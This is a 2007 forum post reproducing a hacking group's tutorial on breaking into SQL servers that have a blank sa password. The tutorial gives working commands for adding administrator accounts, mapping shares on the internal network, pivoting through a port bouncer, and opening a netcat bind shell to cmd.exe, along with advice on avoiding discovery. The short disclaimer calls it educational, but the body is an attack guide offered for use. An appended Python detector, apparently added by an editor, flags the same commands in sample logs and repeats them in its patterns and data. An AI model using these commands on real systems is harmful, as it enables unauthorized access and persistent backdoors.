Gonzalez Posted July 4, 2007

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This is a little disclaimer for if you haven't read the one on our site.
The tools and tutorials KD-Team develops and publishes are only meant for
educational purposes only. WE DO NOT encourage the use of these tools and
tutorials for malicious purposes. We learned a lot during the development of them,
so we hope you also learn and don't just use them without any brains.
We take completely NO responsibility for any damage caused by them, nor
are we or our ISP responsible for what you do with them.
Greetz: KD-Team
http://www.kd-team.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

SQL - Possible situations and solutions to them.
Written by: kd-team
Some info is from other tutorials, thx to the peeps who wrote them.

Well, this tut is intended for the harder machines that are not so easy to hack.
1.) A machine with an internal IP number
2.) A machine in a network with no rights to write to the local hard disk
3.) An alternative shell to the normal sqlexec.exe
4.) A bit of maybe useful words

______________________________________
1.) A machine with an internal IP number |
______________________________________

********* Solution Number 1: *********
Thx to dD for the initial tutorial.
Let's say you hack a machine with the normal sa/blank pass and when you do ipconfig
it says 10.0.0.15 or 192.53.56.12.
The first thing to do is to check if it has a firewall; if that is not the case, then look
if port 135 or port 3389 is open.
Add yourself as a new user or change the password of the admin.
change: net user Admin newpass
new: net user test password /add
When you've done this you can connect with remote desktop to 3389 and use the user/pass,
or just do it the traditional NT way.

********* Solution Number 2: *********
Always when you have a machine with an internal IP number it means that it is part of a network.
That means 2 things: it has ports forwarded (that's how you hacked it, the port of SQL = forwarded,
pretty dumb but oh well), and it also means that there is another machine which has a normal IP, or a
router.
If it is a normal machine then they have used software and 2 network cards to make a network; if
this is the case you can still run an FTP server on it.
The first thing you've got to do is find out which machine could be the main server.
view computers on the network: net view
Usually it has normal names to recognize like Server2000, PrimaryPc, Server, MainServer etc.
Once you've found that out you've got to see if they have shares.
share command: net view \\MainServer
If they've got something like C shared you can just connect to it with no password.
connect command: net use Z: \\MainServer\C
Then change to the new mapped drive.
Now comes the tricky part.
When you are on the share of the server you've got to install a bouncer or a redirector, that is a thing that redirects the connection on a port to another port or IP.
For this example I'll use Bouncer, already posted at the board :)
You run it (it's best to install it as a service; bouncer itself has no service option but it can still be done).
command for bouncer: bouncer.exe --port 1234 --destination 192.53.56.12:1234 --daemon
Little info on this line:
--port = the listening port on the server machine
--destination = the internal IP to where the incoming traffic should be bounced or redirected.
When this is done just run your favorite FTP server on the internal machine and all connections will get there.

_________________________________________________________________________
2.) A machine in a network with no rights to write to the local hard disk |
_________________________________________________________________________
When you have a machine that, when you use ftp or tftp, says that it can't write to the local hard disk,
then just use the method explained above to hack it the NT way, because even though you can't write to the hard disk you usually still can add users etc.

__________________________________________________
3.) An alternative shell to the normal sqlexec.exe |
__________________________________________________
Usually when you have got sqlexec connected and you are working with it you get errors like:
SQL_NO_DATA
SQL_ERROR
and then you just can't do anything with it. Well, here is a simple but effective way to get another shell.
If tftp or ftp works just upload nc.exe (netcat can be found everywhere on the net).
Once uploaded there are 2 commands you can use:
command1: nc.exe -l -p 1234 -d -e cmd.exe
command2: nc.exe -p 1234 -L -d -e cmd.exe
First of all it is NOT WISE to install nc as a service since it doesn't have password protection; that
means that anyone can take over the machine. Now the explanation of the commands:
command1: this is a use and dump command; it means that you can connect only once to it. After you disconnect
it is gone, then you've got to do it all over again with sql.
But as said before this shell is intended to make the hack easier and not as a backdoor.
command2: with this command nc keeps listening, so after you disconnect you can reconnect again.
This is only handy if you are hacking a network and need to disconnect to do other things or something
like that, but not recommended because if someone finds it, bye bye stro. You can stop this by killing nc
after you are done.

_________________________________
4.) A bit of maybe useful words |
_________________________________
When you are hacking or you wanna learn to hack, plz make a difference for yourself. I mean
make up your mind if you wannabe a super fxp/defacing dude (100 boxes in 1 hour) OR
you wanna learn to hack interesting shit. For the first peeps this tut is useless because it is time consuming, so just use the normal and fast shit,
skip networks and such things.
For the second peeps this tut can be useful because it mixes a few ways together so at the end you have
control of the machine.
Last thing to say: Hack away but keep it nice.
Greetz,
kd-team
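A detection-side counterpart, added here as an example and not part of the original post or KD-Team's tools: it scans constructed process-creation log lines for the host actions the tutorial lists (net user /add, net use to a share, a netcat listener bound to cmd.exe, a bouncer --destination redirect). The pipe-delimited log format, host name and timestamps are assumptions.

```python
"""Detection example (editor's addition, not KD-Team code).
Flags the host actions the tutorial above describes in constructed
process-creation log lines of the assumed shape
timestamp|host|parent_image|command_line."""
import re
from typing import Dict, List, Pattern, Tuple

# Each rule: (finding label, regex applied to the command line only)
RULES: List[Tuple[str, Pattern]] = [
    ("local account added via net user",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("remote share mapped via net use",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+use\s+[A-Z]:\s+\\\\\S+\\[A-Z]", re.I)),
    ("netcat listener bound to cmd.exe",
     re.compile(r"\bnc(?:\.exe)?\b.*\s-[lL]\b.*\s-e\s+cmd(?:\.exe)?", re.I)),
    ("port redirector with --destination",
     re.compile(r"--port\s+\d+\s+--destination\s+\d{1,3}(?:\.\d{1,3}){3}:\d+", re.I)),
]

# Constructed sample telemetry (not real logs); values mirror the tutorial's commands.
SAMPLE_LOG = """\
2007-07-04T10:01:02|dbsrv01|sqlservr.exe|net user test password /add
2007-07-04T10:01:30|dbsrv01|sqlservr.exe|net use Z: \\\\MainServer\\C
2007-07-04T10:02:11|dbsrv01|cmd.exe|nc.exe -p 1234 -L -d -e cmd.exe
2007-07-04T10:02:40|dbsrv01|cmd.exe|bouncer.exe --port 1234 --destination 192.53.56.12:1234 --daemon
2007-07-04T10:03:05|dbsrv01|cmd.exe|net use Z: /delete
2007-07-04T10:03:20|dbsrv01|explorer.exe|notepad.exe report.txt
"""


def scan(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per (line, matched rule); benign lines yield nothing."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:  # skip malformed records rather than guessing fields
            continue
        ts, host, parent, cmdline = parts
        for label, pattern in RULES:
            if pattern.search(cmdline):
                findings.append({"time": ts, "host": host, "parent": parent,
                                 "finding": label, "cmdline": cmdline})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} [{f['parent']}] {f['finding']}: {f['cmdline']}")
```

A child of sqlservr.exe spawning net.exe is itself a strong signal, so a real rule set would also key on the parent column rather than the command line alone.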